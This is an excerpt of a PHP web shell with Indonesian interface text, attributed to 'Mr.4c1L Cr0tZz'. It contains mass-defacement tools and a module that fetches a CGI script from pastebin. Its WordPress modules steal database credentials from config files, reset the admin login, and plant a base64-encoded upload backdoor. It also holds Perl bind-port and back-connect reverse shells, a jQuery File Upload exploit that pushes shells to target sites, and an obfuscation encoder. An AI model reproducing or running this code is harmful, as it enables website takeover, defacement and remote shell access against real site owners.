  1446.                 echo "$url -> <font color=red>ERROR</font><br>";
  1447.             }
  1448.         }
  1449.     } else {
  1450.         echo "<center><form method='post'>
  1451.         <u>Defacer</u>: <br>
  1452.         <input type='text' name='nick' size='50' value='Mr.4c1L Cr0tZz'><br>
  1453.         <u>Domains</u>: <br>
  1454.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1455.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1456.         </form>";
  1457.     }
  1458.     echo "</center>";
  1459. } elseif($_GET['do'] == 'cgi') {
  1460.     $cgi_dir = mkdir('idx_cgi', 0755);
  1461.     $file_cgi = "idx_cgi/cgi.izo";
  1462.     $isi_htcgi = "AddHandler cgi-script .izo";
  1463.     $htcgi = fopen(".htaccess", "w");
  1464.     fwrite($htcgi, $isi_htcgi);
  1465.     fclose($htcgi);
  1466.     $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1467.     $cgi = fopen($file_cgi, "w");
  1468.     fwrite($cgi, $cgi_script);
  1469.     fclose($cgi);
  1470.     chmod($file_cgi, 0755);
  1471.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1472. } elseif($_GET['do'] == 'fake_root') {
  1473.     ob_start();
  1474.     $cwd = getcwd();
  1475.     $ambil_user = explode("/", $cwd);
  1476.     $user = $ambil_user[2];
  1477.     if($_POST['reverse']) {
  1478.         $site = explode("\r\n", $_POST['url']);
  1479.         $file = $_POST['file'];
  1480.         foreach($site as $url) {
  1481.             $cek = getsource("$url/~$user/$file");
  1482.             if(preg_match("/hacked/i", $cek)) {
  1483.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
  1484.             }
  1485.         }
  1486.     } else {
  1487.         echo "<center><form method='post'>
  1488.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1489.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1490.         Domain: <br>
  1491.         <textarea style='width: 450px; height: 250px;' name='url'>";
  1492.         reverse($_SERVER['HTTP_HOST']);
  1493.         echo "</textarea><br>
  1494.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1495.         </form><br>
  1496.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1497.     }
  1498. } elseif($_GET['do'] == 'adminer') {
  1499.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1500.     function adminer($url, $isi) {
  1501.         $fp = fopen($isi, "w");
  1502.         $ch = curl_init();
  1503.               curl_setopt($ch, CURLOPT_URL, $url);
  1504.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1505.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1506.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1507.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1508.         return curl_exec($ch);
  1509.               curl_close($ch);
  1510.         fclose($fp);
  1511.         ob_flush();
  1512.         flush();
  1513.     }
  1514.     if(file_exists('adminer.php')) {
  1515.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1516.     } else {
  1517.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1518.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1519.         } else {
  1520.             echo "<center><font color=red>gagal buat file adminer bossque</font></center>";
  1521.         }
  1522.     }
  1523. } elseif($_GET['do'] == 'auto_dwp') {
  1524.     if($_POST['auto_deface_wp']) {
  1525.         function anucurl($sites) {
  1526.             $ch = curl_init($sites);
  1527.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1528.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1529.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1530.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1531.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1532.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1533.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1534.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1535.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1536.             $data = curl_exec($ch);
  1537.                   curl_close($ch);
  1538.             return $data;
  1539.         }
  1540.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1541.             $post = array(
  1542.                    "log" => "$userr",
  1543.                    "pwd" => "$pass",
  1544.                    "rememberme" => "forever",
  1545.                    "wp-submit" => "$wp_submit",
  1546.                    "redirect_to" => "$web",
  1547.                    "testcookie" => "1",
  1548.                    );
  1549.             $ch = curl_init($cek);
  1550.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1551.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1552.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1553.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1554.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1555.                   curl_setopt($ch, CURLOPT_POST, 1);
  1556.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1557.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1558.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1559.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1560.             $data = curl_exec($ch);
  1561.                   curl_close($ch);
  1562.             return $data;
  1563.         }
  1564.         $scan = $_POST['link_config'];
  1565.         $link_config = scandir($scan);
  1566.         $script = htmlspecialchars($_POST['script']);
  1567.         $user = "Acil123";
  1568.         $pass = "Acil123";
  1569.         $passx = md5($pass);
  1570.         foreach($link_config as $dir_config) {
  1571.             if(!is_file("$scan/$dir_config")) continue;
  1572.             $config = file_get_contents("$scan/$dir_config");
  1573.             if(preg_match("/WordPress/", $config)) {
  1574.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1575.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1576.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1577.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1578.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1579.                 $prefix = $dbprefix."users";
  1580.                 $option = $dbprefix."options";
  1581.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1582.                 $db = mysql_select_db($dbname);
  1583.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1584.                 $result = mysql_fetch_array($q);
  1585.                 $id = $result[ID];
  1586.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1587.                 $result2 = mysql_fetch_array($q2);
  1588.                 $target = $result2[option_value];
  1589.                 if($target == '') {                
  1590.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1591.                 } else {
  1592.                     echo "[+] $target <br>";
  1593.                 }
  1594.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1595.                 if(!$conn OR !$db OR !$update) {
  1596.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1597.                     mysql_close($conn);
  1598.                 } else {
  1599.                     $site = "$target/wp-login.php";
  1600.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  1601.                     $b1 = anucurl($site2);
  1602.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1603.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1604.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1605.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1606.                     $www = "m.php";
  1607.                     $fp5 = fopen($www,"w");
  1608.                     fputs($fp5,$upload3);
  1609.                     $post2 = array(
  1610.                             "_wpnonce" => "$anu2",
  1611.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1612.                             "themezip" => "@$www",
  1613.                             "install-theme-submit" => "Install Now",
  1614.                             );
  1615.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1616.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1617.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1618.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1619.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1620.                           curl_setopt($ch, CURLOPT_POST, 1);
  1621.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1622.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1623.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1624.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1625.                     $data3 = curl_exec($ch);
  1626.                           curl_close($ch);
  1627.                     $y = date("Y");
  1628.                     $m = date("m");
  1629.                     $namafile = "id.php";
  1630.                     $fpi = fopen($namafile,"w");
  1631.                     fputs($fpi,$script);
  1632.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1633.                            curl_setopt($ch6, CURLOPT_POST, true);
  1634.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1635.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1636.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1637.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1638.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1639.                     $postResult = curl_exec($ch6);
  1640.                            curl_close($ch6);
  1641.                     $as = "$target/k.php";
  1642.                     $bs = anucurl($as);
  1643.                     if(preg_match("#$script#is", $bs)) {
  1644.                         echo "[+] <font color='white'>berhasil mepes...</font><br>";
  1645.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1646.                         } else {
  1647.                         echo "[-] <font color='red'>gagal mepes bossque...</font><br>";
  1648.                         echo "[!!] coba aja manual: <br>";
  1649.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1650.                         echo "[+] username: <font color=white>$user</font><br>";
  1651.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
  1652.                         }
  1653.                     mysql_close($conn);
  1654.                 }
  1655.             }
  1656.         }
  1657.     } else {
  1658.         echo "<center><h1>WordPress Auto Deface</h1>
  1659.         <form method='post'>
  1660.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1661.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Mr.4c1L Cr0tZz' required><br>
  1662.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar boss!!'>
  1663.         </form>
  1664.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1665.         </center>";
  1666.     }
  1667. } elseif($_GET['do'] == 'auto_dwp2') {
  1668.     if($_POST['auto_deface_wp']) {
  1669.         function anucurl($sites) {
  1670.             $ch = curl_init($sites);
  1671.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1672.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1673.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1674.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1675.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1676.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1677.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1678.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1679.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1680.             $data = curl_exec($ch);
  1681.                   curl_close($ch);
  1682.             return $data;
  1683.         }
  1684.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1685.             $post = array(
  1686.                    "log" => "$userr",
  1687.                    "pwd" => "$pass",
  1688.                    "rememberme" => "forever",
  1689.                    "wp-submit" => "$wp_submit",
  1690.                    "redirect_to" => "$web",
  1691.                    "testcookie" => "1",
  1692.                    );
  1693.             $ch = curl_init($cek);
  1694.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1695.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1696.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1697.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1698.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1699.                   curl_setopt($ch, CURLOPT_POST, 1);
  1700.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1701.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1702.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1703.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1704.             $data = curl_exec($ch);
  1705.                   curl_close($ch);
  1706.             return $data;
  1707.         }
  1708.         $link = explode("\r\n", $_POST['link']);
  1709.         $script = htmlspecialchars($_POST['script']);
  1710.         $user = "Acil123";
  1711.         $pass = "Acil123";
  1712.         $passx = md5($pass);
  1713.         foreach($link as $dir_config) {
  1714.             $config = anucurl($dir_config);
  1715.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1716.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1717.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1718.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1719.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1720.             $prefix = $dbprefix."users";
  1721.             $option = $dbprefix."options";
  1722.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1723.             $db = mysql_select_db($dbname);
  1724.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1725.             $result = mysql_fetch_array($q);
  1726.             $id = $result[ID];
  1727.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1728.             $result2 = mysql_fetch_array($q2);
  1729.             $target = $result2[option_value];
  1730.             if($target == '') {                
  1731.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1732.             } else {
  1733.                 echo "[+] $target <br>";
  1734.             }
  1735.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1736.             if(!$conn OR !$db OR !$update) {
  1737.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1738.                 mysql_close($conn);
  1739.             } else {
  1740.                 $site = "$target/wp-login.php";
  1741.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  1742.                 $b1 = anucurl($site2);
  1743.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1744.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1745.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1746.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1747.                 $www = "m.php";
  1748.                 $fp5 = fopen($www,"w");
  1749.                 fputs($fp5,$upload3);
  1750.                 $post2 = array(
  1751.                         "_wpnonce" => "$anu2",
  1752.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1753.                         "themezip" => "@$www",
  1754.                         "install-theme-submit" => "Install Now",
  1755.                         );
  1756.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1757.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1758.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1759.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1760.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1761.                       curl_setopt($ch, CURLOPT_POST, 1);
  1762.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1763.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1764.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1765.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1766.                 $data3 = curl_exec($ch);
  1767.                       curl_close($ch);
  1768.                 $y = date("Y");
  1769.                 $m = date("m");
  1770.                 $namafile = "id.php";
  1771.                 $fpi = fopen($namafile,"w");
  1772.                 fputs($fpi,$script);
  1773.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1774.                        curl_setopt($ch6, CURLOPT_POST, true);
  1775.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1776.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1777.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1778.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1779.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1780.                 $postResult = curl_exec($ch6);
  1781.                        curl_close($ch6);
  1782.                 $as = "$target/k.php";
  1783.                 $bs = anucurl($as);
  1784.                 if(preg_match("#$script#is", $bs)) {
  1785.                     echo "[+] <font color='white'>berhasil mepes...</font><br>";
  1786.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1787.                     } else {
  1788.                     echo "[-] <font color='red'>gagal mepes bossque...</font><br>";
  1789.                     echo "[!!] coba aja manual: <br>";
  1790.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1791.                     echo "[+] username: <font color=white>$user</font><br>";
  1792.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
  1793.                     }
  1794.                 mysql_close($conn);
  1795.             }
  1796.         }
  1797.     } else {
  1798.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  1799.         <form method='post'>
  1800.         Link Config: <br>
  1801.         <textarea name='link' placeholder='http://target.com/Cr0tz_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1802.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Mr.4c1L Cr0tZz' required><br>
  1803.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1804.         </form></center>";
  1805.     }
  1806. } elseif($_GET['do'] == 'network') {
  1807.     echo "<form method='post'>
  1808.     <u>Bind Port:</u> <br>
  1809.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1810.     <input type='submit' name='sub_bp' value='>>'>
  1811.     </form>
  1812.     <form method='post'>
  1813.     <u>Back Connect:</u> <br>
  1814.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1815.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1816.     <input type='submit' name='sub_bc' value='>>'>
  1817.     </form>";
  1818.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1819.     if(isset($_POST['sub_bp'])) {
  1820.         $f_bp = fopen("/tmp/bp.pl", "w");
  1821.         fwrite($f_bp, base64_decode($bind_port_p));
  1822.         fclose($f_bp);
  1823.  
  1824.         $port = $_POST['port_bind'];
  1825.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1826.         sleep(1);
  1827.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1828.         unlink("/tmp/bp.pl");
  1829.     }
  1830.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1831.     if(isset($_POST['sub_bc'])) {
  1832.         $f_bc = fopen("/tmp/bc.pl", "w");
  1833.         fwrite($f_bc, base64_decode($bind_connect_p));
  1834.         fclose($f_bc);
  1835.  
  1836.         $ipbc = $_POST['ip_bc'];
  1837.         $port = $_POST['port_bc'];
  1838.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1839.         sleep(1);
  1840.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1841.         unlink("/tmp/bc.pl");
  1842.     }
  1843. } elseif ($_GET['do'] == 'kill') {
  1844.   if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1845.       die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  1846.     else
  1847.       echo '<center>unlink failed!</center>';
  1848. } elseif($_GET['do'] == 'jquery') {
  1849.           ?>      <html>
  1850.           <html>
  1851.           <form method="post" action="" enctype="multipart/form-data">
  1852.           <textarea placeholder="http://www.target.com/" style="padding: 5px; resize: none; width: 400px; height: 200px; border: solid 1px white;" name="sites"></textarea><br>
  1853.           <input type="submit" name="go" value="Xploit!" style="margin: 5px auto; hight: 25px; width: 200px;">
  1854.           </form>
  1855.           <?php
  1856.           $site = explode("\r\n", $_POST['sites']);
  1857.           $go = $_POST['go'];
  1858.           if($go) {
  1859.           foreach($site as $sites) {
  1860.           $uploadfile = "shell-anda.php";
  1861.           $ch = curl_init("{$sites}/assets/global/plugins/jquery-file-upload/server/php/");
  1862.           curl_setopt($ch, CURLOPT_POST, 1);
  1863.           curl_setopt($ch, CURLOPT_POSTFIELDS,
  1864.           array('files[]'=>"@$uploadfile"));
  1865.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1866.           $postResult = curl_exec($ch);
  1867.           curl_close($ch);
  1868.           if(preg_match("/url|deleteUrl|deleteType/", $postResult)) {
  1869.           preg_match('/"url":"(.*?)"/', $postResult, $get);
  1870.           $loc = $get[1];
  1871.           echo "URL : <font color=green>$sites</font><br>";
  1872.           echo "Status : Successfully Xploited!<br>";
  1873.           echo "File : <a href='$loc' target='_blank'><font color=green>$loc</font></a><br>";
  1874.           }
  1875.           }
  1876.           }
  1877.           ?>
  1878.           <?php
  1879. } elseif($_GET['do'] == 'endec') {
  1880. $text = $_POST['code'];
  1881. echo "<center>
  1882. <form method='post'><br>
  1883. <textarea placeholder='MASUKIN TEXT YANG MAU DI ENCRYPT/DECRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
  1884. <select class='inputz' size='1' name='ope'>
  1885. <option value='urlencode'>url</option>
  1886. <option value='json'>json</option>
  1887. <option value='ur'>convert_uu</option>
  1888. <option value='base64'>Base64</option>
  1889. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  1890. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
  1891. <option value='coeg'>gzinflate - base64</option>
  1892. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
  1893. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
  1894. <option value='str2'>str_rot13 - base64</option>
  1895. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  1896. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  1897. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 -  base64</option>
  1898. <option value='gzpress'>gzcompress - base64</option>
  1899. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  1900. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  1901. </form>";
  1902. $submit = $_POST['submit'];
  1903. if (isset($submit)){
  1904. $op = $_POST["ope"];
  1905. switch ($op) {case 'base64': $codi=base64_encode($text);
  1906. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1907. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1908. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
  1909. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
  1910. break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
  1911. break;case 'urlencode' : $codi=rawurlencode($text);
  1912. break;case 'ur' : $codi=convert_uuencode($text);
  1913. break;case 'json' : $codi=json_encode(utf8_encode($text));
  1914. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  1915. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  1916. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  1917. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  1918. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
  1919. break;default:break;}}
  1920. $submit = $_POST['submits'];
  1921. if (isset($submit)){
  1922. $op = $_POST["ope"];
  1923. switch ($op) {case 'base64': $codi=base64_decode($text);
  1924. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1925. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  1926. break;case 'coeg' : $codi=gzinflate(base64_decode($text));
  1927. break;case 'base6416x' : $codi=base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
